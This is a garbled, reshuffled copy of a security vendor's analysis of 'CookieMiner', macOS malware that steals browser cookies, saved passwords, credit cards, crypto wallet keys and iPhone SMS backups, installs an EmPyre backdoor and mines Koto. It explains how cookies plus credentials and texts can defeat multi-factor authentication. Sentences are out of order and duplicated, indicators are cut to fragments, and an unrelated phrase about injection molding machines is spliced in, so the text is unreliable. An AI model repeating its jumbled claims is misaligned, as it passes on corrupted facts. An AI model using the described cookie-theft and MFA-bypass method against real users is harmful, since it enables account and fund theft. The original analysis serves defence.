Technical DetailsA rundown of CookieMiner’s behaviors (discussed in more detail in the following sections):-Steals Google Chrome and Apple Safari browser cookies from the victim’s machine -Steals saved usernames and passwords in Chrome -Steals saved credit card credentials in Chrome -Steals iPhone’s text messages if backed up to Mac -Steals cryptocurrency wallet data and keys -Keeps full control of the victim using the EmPyre backdoor -Mines cryptocurrency on the victim’s machine Stealing Cookies The CookieMiner attack begins with a shell script targeting MacOS. The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency.226.py” to extract saved login credentials and credit card information from Chrome’s local data storage. Google Chrome also attracts the threat actors’ attention due to its popularity.]pw/OAZG. Once a user logs into a website, its cookies are stored for the web server to know the login status.

These files usually include private keys of cryptocurrency wallets. The attack targets cookies associated with cryptocurrencyexchanges that include Binance, Coinbase, Poloniex, Bittrex, Bitstamp, MyEtherWallet, and any website having “blockchain” in its domain name such as . In the following sections, They will first briefly introduce some background knowledge, and then dig into the technical details of the malware’s behaviors.. However, if an authentication cookie is also provided along with the username and password, the website might believe the session is associated with a previously authenticated system host and not issue an alert or request additional authentication methods. Most modern cryptocurrency exchanges and online wallet services have multi-factor authentication.A cryptocurrency exchange is a place to trade cryptocurrencies for other assets, such as other digital (crypto)currencies or conventional fiat money.

AutoFocus users can track this activity by using the StealCookie tag. Conclusion The malware “CookieMiner” is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. Stealing cookies is an important step to bypass login anomaly detection.Because of the way this malware attacks the cookies associated with exchanges, Palto Alto has named this malware “CookieMiner”. If the victims use iTunes to backup files from iPhone to Mac (can be via Wi-Fi), their iPhone text messages double color injection molding machine Manufacturers (SMSFILE) will also be retrieved by the attackers. It has been ranked as a top miner in the Maruru mining pool (kotopool. This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated. If only the username and password are stolen and used by a bad actor, the website may issue an alert or request additional authentication for a new login. This software is made to look like an XMRIG-type coinminer, which is used to mine Monero. As seen in Figure 7, the address “k1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H” has considerable mining performance. The attacker is able to send commands to the victim’s machine for remote control. If the cookies are stolen, the attacker could potentially sign into the website to use the victim’s account. This may be a more efficient way to generate profits than outright cryptocurrency mining.Palo Alto Networks’ Unit 42 recently discovered malware that they believe has been developed from OSX.work). EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture.108[.Remote Control For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[. Customers of Palo Alto Networks are protected by WildFire that is able to automatically detect the malware.CookieMiner adopts techniques from the Google Chromium project’s code for its decryption and extraction operations and abuses them.Stealing Credit Cards, Passwords, Wallets and SMS Apple’s Safari is not the only web browser targeted.Cryptocurrency Mining CookieMiner issues a series of commands to configure the victim’s machine to mine cryptocurrency and maintain persistence.py” to extract saved login credentials and credit card information from Chrome’s local data storage.DarthMiner, a malware known to target the Mac platform. If successful, the attackers would have full access to the victim’s exchange account and/or wallet and be able to use those funds as if they were the user themselves. CookieMiner tries to navigate past the authentication process by stealing a combination of the login credentials, text messages, and web cookies.

Palto Alto believes the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency. Additionally, the agent checks if Little Snitch (an application firewall) is running on the victim’s host. The addresses use the “Yescrypt” algorithm which is good for CPU miners but not ideal for GPU miners. However, the filename xmrig2 is usually used by Monero miners. After several steps of deobfuscation, Palto Alto found the attackers using EmPyre for post-exploitation control. It also steals saved passwords in Chrome. This is ideal for malware as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available.

The user’s saved login credentials are also stolen, including usernames, passwords, and the corresponding web URLs. Finally, it seeks to steal iPhone text messages from iTunes backups on the tethered Mac.BackgroundWeb cookies are widely used for authentication. The server hosts the service “curldrop” (https://github. Google Chromium is an open-source version of the Google Chrome browser.By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, Palto Alto believes the bad actors could bypass multifactor authentication for these sites. Furthermore, attackers could manipulate the cryptocurrency prices with large-volume buying and/or selling of stolen assets resulting in additional profits. CookieMiner downloads a Python script named “harmlesslittlecode. The malware also configures the system to load coinmining software on the system. It copies the Safari browser’s cookies to a folder, and uploads it to a remote server (46. If so, it will stop and exit. In fact, though, it loads a coinminer that mine Koto, a lesser-known cryptocurrency that is associated with Japan. Google Chrome also attracts the threat actors’ attention due to its popularity. CookieMiner downloads a Python script named “harmlesslittlecode. By abusing these techniques, CookieMiner attempts to steal credit card information from major issuers, such as Visa, Mastercard, American Express, and Discover.CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. If the bad actors successfully enter the websites using the victim’s identity, they could perform fund withdrawals. Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage.]171:8000).com/kennell/curldrop), which allows users to upload files with curl.Stealing Credit Cards, Passwords, Wallets and SMS Apple’s Safari is not the only web browser targeted. The program xmrig2 is a Mach-O executable for mining cryptocurrency